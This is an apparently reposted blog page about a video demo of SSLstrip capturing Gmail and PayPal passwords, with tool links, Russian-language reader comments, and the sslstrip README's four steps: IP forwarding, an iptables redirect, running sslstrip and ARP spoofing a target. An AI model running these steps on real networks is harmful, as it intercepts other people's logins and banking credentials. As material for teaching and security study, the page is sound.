admin / 02.08.2018
This video shows that with SSL encryption, it isn’t secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.
Содержание
Watch video on-line:
Download video: http://download.g0tmi1k.com/videos_archive/SSLStrip.mp4
All in BackTrack 4 Pre Final
Targets IP: 192.168.1.6
Gateway : 192.168.1.1
Name: sslstrip
Version: 0.2
Home Page: http://www.thoughtcrime.org/software/sslstrip/index.html
Download Link:
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Name: ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net/
Download Link: http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download
Song: 16 Bit Lolitas — Nobody Seems To Care
Video length: 03:55
Capture length: 4:41
Blog Post: https://blog.g0tmi1k.com/2009/07/stripping-ssl-sniffing-https/
Posted by g0tmi1kmitm, video
« Man In The Middle (Ettercap, Metasploit, SBD)Installing BackTrack 4 (Final) in VirtualBox + Extra »
Что там с TSL?
Просто понимая алгоритмы работы шифрования ума не приложу как такое можно запилить без доступа к тачке..10:55:500
Если коротко , то проводится MITM атака (я в этом не смыслю) и проходя через прокси sslstrip’а , он заменяет https:// на http://.00:03:230
о, ребят, я из темы выпал, если кто владеет информацией, опишите что за оно? А то как то странно слышать про то, что ssl трафик ломают. Что там с TSL?
Просто понимая алгоритмы работы шифрования ума не приложу как такое можно запилить без доступа к тачке..
Это был сарказм, кому надо — тот понял.22:50:200
SSLstrip не "ломает" https трафик, а сбрасывает на http, где возможна нормальная (обычная) MITM атака.
Не факт, что клиент вк (в момент получения токена по vkapi) не пошлет тебя на 3 буквы, так как требует в обязательном порядке передачу по защищенному каналу (аля https), по этому, возможно, SSLstrip это не то, что тебе нужно.13:40:380
Я даже не спрашиваю, откуда у тебя 300к.13:57:590
Следующие сообщения
HomePage:https://github.com/graingert/sslstrip/
Author: Moxie Marlinspike
Download:https://pypi.python.org/packages/source/s/sslstrip/sslstrip-0.9.2.tar.gz
Installing: pip install sslstrip Running: sslstrip can be run from the source base without installation. Just run ‘python sslstrip.py -h’ as a non-root user to get the command-line options. The four steps to getting this working (assuming you’re running Linux) are: 1) Flip your machine into forwarding mode (as root): echo "1" > /proc/sys/net/ipv4/ip_forward 2) Setup iptables to intercept HTTP requests (as root): iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port <yourListenPort> 3) Run sslstrip with the command-line options you’d like (see above). 4) Run arpspoof to redirect traffic to your machine (as root): arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress> More Info: http://www.thoughtcrime.org/software/sslstrip/
FILED UNDER : IT